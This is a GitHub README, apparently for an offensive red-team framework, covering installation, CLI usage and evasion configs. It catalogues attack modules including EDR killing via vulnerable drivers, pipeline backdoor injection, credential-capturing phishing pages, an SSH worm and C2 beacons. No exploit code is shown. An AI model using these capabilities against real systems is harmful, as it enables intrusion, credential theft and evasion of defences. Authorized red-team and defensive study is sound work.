ITherso/monolith-test
GitHub: ITherso/monolith-test
一款集成侦察、漏洞利用、C2 通信、规避引擎与多环境攻击模块的红队对抗模拟一体化平台。
Stars: 0 | Forks: 0
# 🔴 MONOLITH - Elite Red Team Framework
███╗ ███╗ ██████╗ ███╗ ██╗ ██████╗ ██╗ ██╗████████╗██╗ ██╗
████╗ ████║██╔═══██╗████╗ ██║██╔═══██╗██║ ██║╚══██╔══╝██║ ██║
██╔████╔██║██║ ██║██╔██╗ ██║██║ ██║██║ ██║ ██║ ███████║
██║╚██╔╝██║██║ ██║██║╚██╗██║██║ ██║██║ ██║ ██║ ██╔══██║
██║ ╚═╝ ██║╚██████╔╝██║ ╚████║╚██████╔╝███████╗██║ ██║ ██║ ██║
╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝
Elite Red Team Automation Platform
v2.5 - February 2026
[](https://www.python.org/)
[](https://flask.palletsprojects.com/)
[](LICENSE)
[](https://github.com/ITherso/monolith)
## 🎯 Overview
MONOLITH is an all-in-one offensive automation platform for authorized red team engagements, adversary emulation, and security research. It combines vulnerability discovery, active directory exploitation, C2 infrastructure, advanced evasion, and exotic attack vectors (cloud, Kubernetes, SCADA, blockchain) in a single framework.
### ⚡ Features at a Glance
| Category | Highlights |
|----------|------------|
| **Recon & Scanning** | Nmap, Nuclei, Gobuster, black/gray/white box web scanning |
| **Exploitation** | Auto-exploit engine, SQLi/XSS/SSRF/SSTI/IDOR/CORS detection |
| **Active Directory** | Kerberos tickets, NTLM Relay, DCShadow, DCSync |
| **C2 & Implants** | HTTP/S, DoH, Telegram, Discord, Steganography, Blockchain (ETH/BTC), Python/Go/Rust beacons |
| **Evasion** | AMSI/ETW bypass, indirect syscalls, process injection, sleep masking, behavioral mimicry, GAN/ML evasion |
| **Persistence** | WMI, COM, Registry, BITS, DLL sideloading |
| **Lateral Movement** | WMIExec, SMB, RDP hijack, SCCM hunter, WSUS spoof |
| **Cloud Pivot** | Azure, AWS, GCP lateral movement modules |
| **Reporting** | Real-time dashboard, PDF/HTML/JSON reports, audit logs |
## 📋 Table of Contents
- [Overview](#-overview)
- [Quick Start](#-quick-start)
- [Installation](#️-installation)
- [Configuration](#️-configuration)
- [Testing](#-testing)
- [Deployment](#-deployment)
- [Troubleshooting](#-troubleshooting)
- [Architecture Overview](#️-architecture-overview)
- [Module Map](#-complete-module-map)
- [Core Attack Modules](#-core-attack-modules)
- [Evasion Engine](#️-evasion-engine)
- [C2 & Implant Framework](#️-c2--implant-framework)
- [Persistence](#-persistence)
- [AI/ML Features](#-aiml-powered-features)
- [Web Interface](#-web-interface)
- [API Reference](#-api-reference)
- [God Mode Anti-Forensics](#-god-mode-anti-forensics-february-2026)
- [Cross-Module Integration](#-cross-module-integration)
- [K8s Kraken - Kubernetes Warfare](#-k8s-kraken---kubernetes-warfare-february-2026)
- [Orbital & RF Warfare](#-orbital--rf-warfare-february-2026)
- [SCADA & ICS Hunter](#-scada--ics-hunter-february-2026)
- [Automotive & CAN Bus Hacking](#-automotive--can-bus-hacking-february-2026)
- [Air-Gap Jumping](#-air-gap-jumping-february-2026)
- [Blockchain & Decentralized C2](#-blockchain--decentralized-c2-february-2026)
## 🚀 Quick Start
### 🖥️ Terminal Demo
$ python3 cyber.py --target https://example.com --quick
██████╗ ██████╗ ███████╗ █████╗ ███╗ ███╗███████╗
██╔════╝██╔═══██╗██╔════╝██╔══██╗████╗ ████║██╔════╝
██║ ██║ ██║█████╗ ███████║██╔████╔██║█████╗
██║ ██║ ██║██╔══╝ ██╔══██║██║╚██╔╝██║██╔══╝
╚██████╗╚██████╔╝███████╗██║ ██║██║ ╚═╝ ██║███████╗
╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝
[*] Target : https://example.com
[*] Mode : Quick Reconnaissance
[*] Modules : Nmap | Nuclei | Gobuster | Web Scanner
[*] Output : SQLite + Live Dashboard
[+] Nmap scan started → 1000 ports, version detection
[+] Nuclei templates loaded → 2500+ templates
[+] Gobuster directory scan → /admin, /backup, /.git
[+] Web scanner started → SQLi, XSS, SSRF, SSTI, IDOR
[+] Report generated → /reports/example.com_20250202.html
[SUCCESS] Scan completed in 42s. Open http://localhost:8080 to view results.
### Web Interface
# Clone and setup
git clone https://github.com/ITherso/monolith.git
cd monolith
# Create virtual environment
python3 -m venv .venv
source .venv/bin/activate
# Install dependencies
pip install -r requirements.txt
# Start the server
make run-prod
# OR
gunicorn -w 4 -b 0.0.0.0:8080 wsgi:application
**Access:** http://localhost:8080
### 🖥️ Command Line Interface (CLI)
# Run MONOLITH web interface with CLI
python3 cyber.py
# Web App Scanner - Black Box Scan
python3 cyber.py --web-app-scan https://target.com --scan-mode black_box
# Web App Scanner - Detailed Scan
python3 cyber.py --web-app-scan https://target.com --scan-mode gray_box --scan-depth 4 --max-requests 5000
# Web App Scanner - Output as HTML Report
python3 cyber.py --web-app-scan https://target.com --output-format html
# Web App Scanner - Output as JSON Report
python3 cyber.py --web-app-scan https://target.com --output-format json
# Target Reconnaissance Scan
python3 cyber.py --target https://example.com --quick
# Deep Network Scan
python3 cyber.py --target 192.168.1.0/24 --deep
# Auto-Exploit Mode
python3 cyber.py --target https://vulnerable.app --autoexploit
# Threat Hunter
python3 cyber.py --threathunter
# Headless Mode (No Web UI)
python3 cyber.py --target 10.0.0.0/8 --headless
# Database Management
python3 cyber.py --db-upgrade # Run migrations
python3 cyber.py --db-current # Show current revision
python3 cyber.py --db-revision "Add feature" # Create migration
## 🛠️ Installation
### Prerequisites
| Requirement | Minimum | Recommended |
|-------------|---------|-------------|
| **OS** | Windows 10+, Linux (Kali/Ubuntu), macOS | Windows 11 / Ubuntu 22.04+ |
| **Python** | 3.10+ | 3.12+ |
| **RAM** | 4 GB | 8 GB+ |
| **Disk** | 2 GB free | 5 GB+ free |
| **Docker** | Optional (for containerized deployment) | Latest stable |
### Step-by-Step Installation
# 1. Clone the repository
git clone https://github.com/ITherso/monolith-test.git
cd monolith-test
# 2. Create virtual environment (Python 3.10+)
python3 -m venv .venv
# 3. Activate virtual environment
# Windows:
.venv\Scripts\activate
# Linux/macOS:
source .venv/bin/activate
# 4. Upgrade pip
pip install --upgrade pip
# 5. Install dependencies
pip install -r requirements.txt
# 6. Install optional extras (AI features, cloud modules, etc.)
pip install -r requirements_extra.txt
# 7. Install development dependencies (for contributors)
pip install pytest pytest-cov ruff mypy pre-commit
# 8. Initialize database
python init_db.py
# 9. Run migrations
python cyber.py --db-upgrade
# 10. Verify installation
python cyber.py --target 127.0.0.1 --quick
### System-Specific Notes
**Windows:**
# Some modules require Visual C++ Build Tools
# Download from: https://visualstudio.microsoft.com/downloads/
# Also install: Npcap (for packet capture)
# https://npcap.com/
**Linux:**
# Required packages
sudo apt update
sudo apt install -y build-essential libssl-dev libffi-dev \\
python3-dev libmysqlclient-dev pkg-config
# For eBPF rootkit module (Linux 5.8+)
sudo apt install -y clang llvm libbpf-dev
# For ICMP tunneling (requires raw socket privileges)
sudo sysctl -w net.ipv4.ping_group_range="0 2147483647"
**macOS:**
# Install Xcode Command Line Tools
xcode-select --install
# For packet capture
brew install libpcap
### Docker Installation
# Build image
docker build -t monolith .
# Run with docker-compose
docker-compose up -d
# Access at http://localhost:8080
## ⚙️ Configuration
### Configuration Files
All configuration files are located in the `configs/` directory. The framework supports multiple evasion profiles that can be mixed and matched.
### Evasion Profiles
| Profile | Use Case | Features |
|---------|----------|----------|
| `none` | Testing / Lab | No evasion, direct execution |
| `default` | Standard ops | Basic AMSI bypass, random delays |
| `stealth` | EDR environments | ETW bypass, process hollowing, indirect syscalls |
| `paranoid` | Advanced EDR | Sleepmask, API hashing, traffic masking, anti-forensics |
| `aggressive` | Time-critical | Fast execution, minimal evasion overhead |
### Config File Structure
# configs/evasion_profile_stealth.yaml
evasion:
amsi_bypass: true
etw_bypass: true
process_hollowing: true
indirect_syscalls: true
sleep_obfuscation: false
traffic_masking: false
c2:
callback_interval: 60
jitter: 30
encryption: aes-256-gcm
lateral:
method: wmiexec
timeout: 30
max_threads: 5
### Environment Variables
Create a `.env` file in the project root:
# Flask Configuration
FLASK_SECRET_KEY=your-secret-key-here
DATABASE_URL=sqlite:///monolith.db
# API Keys (optional - for AI/cloud features)
OPENAI_API_KEY=sk-...
AZURE_CLIENT_ID=...
AZURE_CLIENT_SECRET=...
AWS_ACCESS_KEY_ID=...
AWS_SECRET_ACCESS_KEY=...
# C2 Configuration
C2_CALLBACK_URL=https://your-c2-server.com
C2_ENCRYPTION_KEY=your-encryption-key
# Logging
LOG_LEVEL=INFO
LOG_FILE=monolith.log
### Beacon Configuration
# configs/beacon_config.yaml
beacon:
sleep: 60
jitter: 30
kill_date: null
max_retries: 3
retry_delay: 300
channels:
- http
- https
- dns
encryption: aes-256-gcm
compression: true
## 🧪 Testing
### Running Tests
# Run all tests
pytest
# Run with coverage
pytest --cov=cybermodules --cov=evasion --cov=cyberapp --cov-report=html
# Run specific test file
pytest tests/test_vulnerable.py -v
# Run specific test class
pytest tests/test_persistence_god.py::TestPersistenceGodMonster -v
# Run with markers
pytest -m "not slow" # Skip slow tests
pytest -m "windows_only" # Run Windows-specific tests
### Test Structure
| Test File | Coverage Area |
|-----------|---------------|
| `test_vulnerable.py` | Vulnerability scanners (SQLi, XSS, SSRF, etc.) |
| `test_kerberos_chain.py` | Kerberos attack chain |
| `test_kerberos_relay_ninja.py` | NTLM relay and coercion |
| `test_lateral.py` | Lateral movement engine |
| `test_persistence_god.py` | Persistence mechanisms |
| `test_wmi_persistence.py` | WMI event filters/consumers |
| `test_c2.py` | C2 framework and beacon manager |
| `test_cloud_pivot.py` | Azure/AWS/GCP pivot modules |
| `test_syscalls_obfuscation.py` | Indirect syscall resolution |
| `test_report_generator.py` | Report generation |
| `test_evasion.py` | Evasion techniques |
### Coverage Requirements
The project enforces a minimum test coverage threshold defined in `pytest.ini`:
[tool:pytest]
addopts = --cov=cybermodules --cov=evasion --cov=cyberapp --cov-fail-under=45
## 🚀 Deployment
### Production Deployment
# Using Gunicorn (Linux/macOS)
gunicorn -w 4 -b 0.0.0.0:8080 wsgi:application
# Using Waitress (Windows)
pip install waitress
waitress-serve --port=8080 wsgi:application
# Using uWSGI
uwsgi --socket 0.0.0.0:8080 --protocol=http --module wsgi:application --processes 4
### Docker Deployment
# Build
docker build -t monolith:latest .
# Run
docker run -d -p 8080:8080 \\
-v $(pwd)/configs:/app/configs \\
-v $(pwd)/data:/app/data \\
monolith:latest
### Reverse Proxy (Nginx)
server {
listen 80;
server_name monolith.local;
location / {
proxy_pass http://127.0.0.1:8080;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
}
}
## 🔧 Troubleshooting
### Common Issues
| Issue | Solution |
|-------|----------|
| `ModuleNotFoundError: No module named 'bs4'` | `pip install beautifulsoup4` |
| `ImportError: cannot import name 'PBKDF2'` | Upgrade cryptography: `pip install --upgrade cryptography` |
| `PermissionError` on Linux | Run with `sudo` or add capabilities: `sudo setcap cap_net_raw+ep $(which python3)` |
| `Database is locked` | Ensure only one instance is running; delete `monolith.db` and re-init |
| `Coverage failure` | Reduce coverage threshold in `pytest.ini` or add more tests |
| Port 8080 in use | Change `PORT` environment variable or use `--port` flag |
### Logs
# Application logs
tail -f monolith.log
# Docker logs
docker-compose logs -f
# Windows Event Log (for某些modules)
eventvwr.msc
## 🏗️ Architecture Overview
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🔴 MONOLITH FRAMEWORK ARCHITECTURE │
│ Professional Red Team Automation Platform │
│ by ITherso │
└─────────────────────────────────────────────────────────────────────────────────────────┘
│
┌─────────────────────┼─────────────────────┐
│ │ │
▼ ▼ ▼
┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐
│ 🌐 WEB UI │ │ 🔌 REST API │ │ ⌨️ CLI │
│ Flask/Jinja2 │ │ JSON/WebSocket│ │ Python CLI │
│ Port: 8080 │ │ /api/* │ │ cyber.py │
└────────┬────────┘ └────────┬────────┘ └────────┬────────┘
│ │ │
└─────────────────────┼─────────────────────┘
│
▼
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🎯 CORE ENGINE (cyberapp/) │
├─────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │
│ │ app.py │ │ routes/ │ │ services/ │ │ models/ │ │
│ │ Flask App │ │ API Handlers │ │ Business │ │ Data Models │ │
│ │ Factory │ │ Blueprints │ │ Logic │ │ SQLAlchemy │ │
│ └──────────────┘ └──────────────┘ └──────────────┘ └──────────────┘ │
│ │
└─────────────────────────────────────────────────────────────────────────────────────────┘
│
┌─────────────────────────────┼─────────────────────────────┐
│ │ │
▼ ▼ ▼
┌─────────────────────┐ ┌─────────────────────┐ ┌─────────────────────┐
│ 🗡️ ATTACK MODULES │ │ 🛡️ EVASION ENGINE │ │ 🤖 AI/ML ENGINE │
│ cybermodules/ │ │ evasion/ │ │ AI-Powered │
└─────────────────────┘ └─────────────────────┘ └─────────────────────┘
│ │ │
▼ ▼ ▼
┌─────────────────────┐ ┌─────────────────────┐ ┌─────────────────────┐
│ • Kerberos Chain │ │ • AMSI/ETW Bypass │ │ • AI Vuln Scanner │
│ • NTLM Relay │ │ • Sleepmask │ │ • LLM Engine │
│ • Lateral Movement │ │ • Process Injection │ │ • Adversarial ML │
│ • Golden/Silver │ │ • EDR Evasion │ │ • AI Post-Exploit │
│ • Cloud Pivot │ │ • Traffic Masking │ │ • Auto-Exploit │
│ • AD Enumeration │ │ • AI Adversarial │ │ • Purple Team AI │
└─────────────────────┘ └─────────────────────┘ └─────────────────────┘
## 🗺️ Complete Module Map
### 📁 Directory Structure
monolith/
├── 📂 cyberapp/ # Main Flask Application
│ ├── __init__.py
│ ├── app.py # Application factory
│ ├── cli.py # CLI commands
│ ├── extensions.py # Flask extensions
│ ├── settings.py # Configuration
│ ├── 📂 models/ # Database models
│ │ ├── attack.py
│ │ ├── campaign.py
│ │ ├── credential.py
│ │ └── session.py
│ ├── 📂 routes/ # API & Page routes
│ │ ├── api.py # Main API
│ │ ├── attack.py # Attack endpoints
│ │ ├── auth.py # Authentication
│ │ ├── dashboard.py # Dashboard
│ │ ├── evasion.py # Evasion routes (+2000 lines)
│ │ ├── kerberos.py # Kerberos attacks
│ │ ├── lateral.py # Lateral movement
│ │ ├── phishing.py # Phishing kit
│ │ ├── vuln.py # Vulnerability scanning
│ │ └── waf.py # WAF bypass
│ ├── 📂 services/ # Business logic
│ └── 📂 workers/ # Background tasks
│
├── 📂 cybermodules/ # Core Attack Modules (~20,000+ lines)
│ ├── ad_enum.py # Active Directory enumeration
│ ├── ai_lateral_guide.py # AI-guided lateral movement
│ ├── ai_post_exploit.py # AI post-exploitation
│ ├── ai_vuln.py # AI vulnerability analysis
│ ├── api_scanner.py # API security scanner
│ ├── arsenal.py # Payload arsenal
│ ├── attack_graph.py # Attack path visualization
│ ├── autoexploit.py # Automatic exploitation
│ ├── blockchain.py # Blockchain integration
│ ├── bypass_amsi_etw.py # AMSI/ETW bypass
│ ├── c2_beacon.py # C2 beacon
│ ├── c2_framework.py # C2 framework
│ ├── c2_implant.py # Implant generation
│ ├── chain_workers.py # Attack chain workers
│ ├── cleanup_engine.py # Forensic cleanup
│ ├── cloud_pivot.py # Cloud pivot (Azure/AWS/GCP)
│ ├── cloud.py # Cloud utilities
│ ├── decentralized.py # Decentralized C2
│ ├── evasion_testing.py # Evasion testing
│ ├── evasion.py # Evasion utilities
│ ├── exploit.py # Exploit database
│ ├── full_chain_orchestrator.py # Full chain orchestration
│ ├── gamification.py # Training gamification
│ ├── golden_ticket.py # Golden ticket attacks
│ ├── hashdump.py # Hash extraction
│ ├── kerberos_chain.py # Kerberos attack chain
│ ├── kerberos_relay_ninja.py # Kerberos relay
│ ├── kerberos_tickets.py # Ticket manipulation
│ ├── lateral_chain_config.py # Lateral chain config
│ ├── lateral_evasion.py # Lateral movement evasion
│ ├── lateral_hooks.py # Lateral hooks
│ ├── lateral_movement.py # Lateral movement
│ ├── llm_engine.py # LLM integration
│ ├── loot_exfil.py # Data exfiltration
│ ├── lotl_execution.py # Living-off-the-land
│ ├── ntlm_relay.py # NTLM relay attacks
│ ├── opsec.py # Operational security
│ ├── payload_generator.py # Payload generation
│ ├── persistence.py # Persistence mechanisms
│ ├── phishing.py # Phishing utilities
│ ├── quantum_crypto.py # Quantum-safe crypto
│ ├── report_generator.py # Report generation
│ ├── session_hooks.py # Session hooks
│ ├── social_engineering.py # Social engineering
│ ├── threat_hunter.py # Threat hunting
│ └── vulnerable.py # Vulnerable endpoints
│
├── 📂 evasion/ # Advanced Evasion Modules (~8,000+ lines)
│ ├── ai_adversarial.py # GAN-based evasion
│ ├── amsi_bypass.py # AMSI bypass techniques
│ ├── edr_poison.py # EDR telemetry poisoning
│ ├── process_injection.py # Process injection
│ ├── sleepmask.py # Sleep obfuscation
│ ├── syscall_obfuscation.py # Syscall obfuscation
│ └── traffic_masking.py # Traffic masking
│
├── 📂 tools/ # Standalone Tools & PRO Modules
│ ├── purple_team_validator.py # Purple team automation (~1500 lines)
│ ├── cred_harvest.py # Credential harvesting & session hijacking kit
│ ├── pentest_orchestrator.py # Automated pentest workflow orchestrator
│ ├── vuln_scanner_integrator.py # Multi-scanner vulnerability assessment (~1270 lines)
│ ├── service_fingerprinter.py # Advanced service/version fingerprinting (~800 lines)
│ ├── web_app_scanner.py # Web application vulnerability scanner (~900 lines)
│ ├── cloud_asset_discovery.py # Shadow IT & cloud asset discovery (~750 lines)
│ ├── privesc_toolkit.py # Windows/Linux privilege escalation (~1100 lines)
│ │
│ │ # 🔥 PRO ADVANCED MODULES (February 2026)
│ ├── cicd_pipeline_jacker.py # CI/CD Pipeline Poisoning (~850 lines) [PRO]
│ ├── byovd_module.py # BYOVD EDR Killer - Kernel Level (~650 lines) [PRO]
│ ├── stego_c2.py # Steganography C2 - LSB Encoding (~550 lines) [PRO]
│ ├── bitb_phishing.py # Browser-in-the-Browser Phishing (~700 lines) [PRO]
│ ├── smart_spray.py # AI Smart Password Spraying (~500 lines) [PRO/AI]
│ │
│ │ # 🐧 LINUX INFRASTRUCTURE DOMINATION (February 2026)
│ ├── ebpf_rootkit.py # eBPF Rootkit Engine - Kernel Level (~800 lines) [KERNEL]
│ ├── ssh_worm.py # SSH Worm & Key Harvester (~700 lines) [WORM]
│ ├── docker_escape.py # Docker Container Escape (~700 lines) [ESCAPE]
│ │
│ │ # � K8S KRAKEN - KUBERNETES WARFARE (February 2026)
│ ├── k8s_warfare.py # K8s Kraken - Kubelet Exploit & Helm Backdoor (~1000 lines) [KRAKEN]
│ │
│ │ # 🔗 SUPPLY CHAIN ATTACKS (February 2026)
│ ├── supply_chain_attack.py # Supply Chain Attack Suite (~1400 lines) [CHAIN]
│ │
│ │ # 📡 ORBITAL & RF WARFARE (February 2026)
│ ├── orbital_rf_warfare.py # SatCom Sniffer, GPS Spoof, IMSI Catcher (~1000 lines) [SDR]
│ │
│ │ # 🏭 SCADA & ICS HUNTER (February 2026)
│ ├── scada_ics_hunter.py # Modbus/DNP3/OPC Scanner, PLC Exploitation (~800 lines) [ICS]
│ │
│ │ # 🚗 AUTOMOTIVE & CAN BUS (February 2026)
│ ├── automotive_canbus.py # CAN Bus Sniffer, ECU Fuzzing, DoS (~700 lines) [VEHICLE]
│ │
│ │ # 🔌 AIR-GAP JUMPING (February 2026)
│ ├── airgap_jumper.py # Ultrasonic Exfil, LED Morse, Covert Channels (~600 lines) [AIRGAP]
│ │
│ │ # ₿ BLOCKCHAIN & DECENTRALIZED C2 (February 2026)
│ └── blockchain_c2.py # Bitcoin OP_RETURN, IPFS Hosting, ETH Contract (~700 lines) [UNSTOPPABLE]
│
├── 📂 templates/ # Web UI Templates (~50+ pages)
│ ├── dashboard.html # Main dashboard
│ ├── adversarial.html # AI adversarial training
│ ├── attack_graph.html # Attack visualization
│ ├── edr_poison.html # EDR poisoning UI
│ ├── kerberos_chain.html # Kerberos attacks
│ ├── lateral_movement.html # Lateral movement
│ ├── phishing_advanced.html # Phishing kit
│ ├── purple_team.html # Purple team validator
│ ├── relay_ninja.html # Relay ninja
│ ├── vr_viz.html # VR visualization
│ ├── waf_bypass.html # WAF bypass
│ ├── webshell.html # Web shell manager
│ ├── zeroday.html # Zero-day research
│ ├── memory_evasion.html # Memory forensics evasion
│ ├── ebpf_rootkit.html # eBPF rootkit dashboard
│ ├── ssh_worm.html # SSH worm control panel
│ ├── docker_escape.html # Docker escape techniques
│ ├── supply_chain_attack.html # Supply chain attack dashboard
│ ├── k8s_warfare.html # K8s Kraken - Kubernetes Warfare dashboard
│ ├── orbital_rf_warfare.html # Orbital RF Warfare - SDR Operations
│ ├── scada_ics_hunter.html # SCADA/ICS Hunter - Industrial Control Systems
│ ├── automotive_canbus.html # Automotive CAN Bus - Vehicle Hacking
│ ├── airgap_jumper.html # Air-Gap Jumper - Covert Exfiltration
│ ├── blockchain_c2.html # Blockchain C2 - Decentralized Command & Control
│ └── ...
│
├── 📂 configs/ # Configuration Files
│ ├── ai_adversarial_config.yaml
│ ├── beacon_config.yaml
│ ├── behavioral_mimicry_config.yaml
│ ├── cloud_pivot_config.yaml
│ ├── evasion_profile_*.yaml # Multiple evasion profiles
│ ├── lateral_chain_example.yaml
│ ├── quantum_crypto_config.yaml
│ ├── relay_ninja_config.yaml
│ ├── vr_viz_config.yaml
│ ├── waf_bypass_config.yaml
│ ├── web_shell_config.yaml
│ └── zero_day_config.yaml
│
├── 📂 agents/ # Beacon Agents
│ ├── evasive_beacon.py
│ └── python_beacon.py
│
├── 📂 impacket/ # Impacket Integration
├── 📂 scripts/ # Utility Scripts
├── 📂 docs/ # Documentation
├── 📂 tests/ # Test Suite
│
├── cyber.py # Main CLI entry
├── wsgi.py # WSGI entry point
├── Makefile # Build commands
├── Dockerfile # Container build
├── docker-compose.yml # Docker orchestration
├── requirements.txt # Python dependencies
└── pyproject.toml # Project metadata
## � PRO Advanced Attack Modules (February 2026)
### 🏭 CI/CD Pipeline Jacker
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🏭 CI/CD PIPELINE JACKER │
│ Supply Chain Attack via Pipeline Poisoning │
│ tools/cicd_pipeline_jacker.py (~850 lines) │
│ Persistence Level: GOD MODE 🔥 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ SUPPORTED PLATFORMS │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌────────────────┐ ┌────────────────┐ ┌────────────────┐ ┌────────────────┐ │
│ │ 🔧 JENKINS │ │ 🦊 GITLAB CI │ │ 🐙 GITHUB │ │ ☁️ AZURE │ │
│ │ │ │ │ │ ACTIONS │ │ DEVOPS │ │
│ │ • Groovy │ │ • .gitlab-ci │ │ • workflows/ │ │ • azure- │ │
│ │ Pipelines │ │ .yml │ │ *.yml │ │ pipelines │ │
│ │ • Shared Libs │ │ • Runners │ │ • Composite │ │ .yml │ │
│ │ • Credentials │ │ • CI Variables │ │ Actions │ │ • Service │ │
│ └────────────────┘ └────────────────┘ └────────────────┘ │ Connections │ │
│ └────────────────┘ │
│ ATTACK VECTORS │
│ ├── 🐚 Reverse Shell Injection │
│ ├── 🔐 Credential Exfiltration (secrets, tokens, API keys) │
│ ├── 👻 Persistent Backdoor Access │
│ ├── 📦 Supply Chain Artifact Poisoning │
│ └── 🎭 Dependency Confusion Attacks │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
POST /cicd/api/scan - Detect CI/CD platforms
POST /cicd/api/enumerate - Enumerate pipelines
POST /cicd/api/generate-backdoor - Generate backdoor payload
POST /cicd/api/inject - Inject backdoor into pipeline
POST /cicd/api/test-creds - Test default credentials
### 💀 BYOVD Module - EDR Killer
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 💀 BYOVD EDR KILLER │
│ Bring Your Own Vulnerable Driver - Ring 0 Operations │
│ tools/byovd_module.py (~650 lines) │
│ ⚠️ KERNEL LEVEL ⚠️ │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ VULNERABLE DRIVER DATABASE EDR PRODUCT TARGETS │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────────────────┐ ┌─────────────────────────────┐ │
│ │ 🔧 RTCore64.sys (MSI) │ │ 🛡️ Windows Defender │ │
│ │ CVE-2019-16098 │ │ 🦅 CrowdStrike Falcon │ │
│ │ │ │ 🛸 SentinelOne │ │
│ │ 💻 DBUtil_2_3.sys (Dell) │ │ ⬛ Carbon Black │ │
│ │ CVE-2021-21551 │ │ 🔵 Sophos │ │
│ │ │ │ 🟢 Kaspersky │ │
│ │ 🎮 GDRV.sys (Gigabyte) │ │ 🔴 ESET │ │
│ │ CVE-2018-19320 │ │ 🟠 Bitdefender │ │
│ │ │ │ 🟣 Malwarebytes │ │
│ │ 🖥️ iqvw64e.sys (Intel) │ │ 🔷 Trend Micro │ │
│ │ 🔬 PROCEXP (Sysinternals) │ └─────────────────────────────┘ │
│ │ 🛡️ aswArPot.sys (Avast) │ │
│ └─────────────────────────────┘ │
│ │
│ CAPABILITIES │
│ ├── 👁️ Kernel Memory Read │
│ ├── ✏️ Kernel Memory Write │
│ ├── 💀 Kill Protected Processes │
│ ├── 📤 Unload Kernel Drivers │
│ └── 📝 Registry/File Access │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
GET /byovd/api/drivers - List vulnerable drivers
GET /byovd/api/edr-products - List supported EDR products
POST /byovd/api/detect-edr - Detect EDR on target
POST /byovd/api/generate-payload - Generate BYOVD payload
POST /byovd/api/deploy - Deploy vulnerable driver
POST /byovd/api/kill-edr - Terminate EDR processes
### 🖼️ Steganography C2
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🖼️ STEGANOGRAPHY C2 │
│ Covert Command & Control via Image Steganography │
│ tools/stego_c2.py (~550 lines) │
│ Hide in Plain Sight 👁️ │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ ENCODING METHODS EXFILTRATION PLATFORMS │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────────────────┐ ┌─────────────────────────────┐ │
│ │ 📊 LSB Simple │ │ 🖼️ Imgur (Anonymous) │ │
│ │ Basic Least Significant │ │ 💬 Discord CDN │ │
│ │ Bit encoding │ │ 📋 Pastebin (Base64) │ │
│ │ │ │ 🐦 Twitter/X │ │
│ │ 🎲 LSB Random │ │ ✈️ Telegram │ │
│ │ Random pixel selection │ └─────────────────────────────┘ │
│ │ for better stealth │ │
│ │ │ AGENT CODE GENERATION │
│ │ 🔐 LSB Encrypted │ ┌─────────────────────────────┐ │
│ │ XOR cipher + LSB │ │ 🐍 Python │ │
│ │ │ │ 💠 PowerShell │ │
│ │ 📈 DCT JPEG │ │ 🔷 C# │ │
│ │ DCT coefficient mod │ └─────────────────────────────┘ │
│ │ │ │
│ │ 🎨 Palette PNG │ │
│ └─────────────────────────────┘ │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
POST /stego/api/encode - Encode message into image
POST /stego/api/decode - Decode message from image
POST /stego/api/capacity - Check image capacity
POST /stego/api/generate-agent - Generate stego C2 agent
POST /stego/api/exfil - Exfiltrate via steganography
### 🎭 Browser-in-the-Browser (BitB) Phishing
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🎭 BROWSER-IN-THE-BROWSER PHISHING │
│ Mr.D0x Technique - Pixel-Perfect Fake Popups │
│ tools/bitb_phishing.py (~700 lines) │
│ Social Engineering PRO 🎣 │
└─────────────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────────────┐
│ OAUTH PROVIDER TEMPLATES BROWSER STYLES │
├──────────────────────────────────────────────────────────────────────────────────────────┤
│ │
│ ┌─────────────────────────────┐ ┌─────────────────────────────┐ │
│ │ 🔴 Google │ │ 🪟 Chrome Windows │ │
│ │ 🔵 Microsoft │ │ 🍎 Chrome macOS │ │
│ │ 🍎 Apple │ │ 🦊 Firefox │ │
│ │ 🐙 GitHub │ │ 🌊 Edge │ │
│ │ 🔐 Okta │ │ 🧭 Safari │ │
│ │ ☁️ AWS │ └─────────────────────────────┘ │
│ │ 👤 Facebook │ │
│ │ 💼 LinkedIn │ FEATURES │
│ └─────────────────────────────┘ ├── 🎯 Campaign Management │
│ ├── 📊 Real-time Credential Capture │
│ FAKE BROWSER WINDOW ├── 🔗 Custom Callback URLs │
│ ┌─────────────────────────────┐ ├── 📱 Multi-target Support │
│ │ ⭕🟡🟢 │🔒 accounts.google │ └── 📈 Success Rate Tracking │
│ │────────────────────────────│ │
│ │ [Google Logo] │ │
│ │ Sign in │ │
│ │ ┌─────────────────────┐ │ │
│ │ │ Email or phone │ │ │
│ │ └─────────────────────┘ │ │
│ │ [Next] │ │
│ └─────────────────────────────┘ │
│ │
└──────────────────────────────────────────────────────────────────────────────────────────┘
API Endpoints:
POST /bitb/api/generate - Generate phishing page
POST /bitb/api/campaign - Create campaign
GET /bitb/api/campaigns - List campaigns
GET /bitb/api/campaign/{id} - Get campaign details
POST /bitb/api/capture - Capture credentials webhook
### 🧠 Smart Password Spraying
┌─────────────────────────────────────────────────────────────────────────────────────────┐
│ 🧠 SMART PASSWORD SPRAYING │
│ AI-Powered Intelligent Credential Testing │
│ tools/smart_spray.py (~500 lines) │
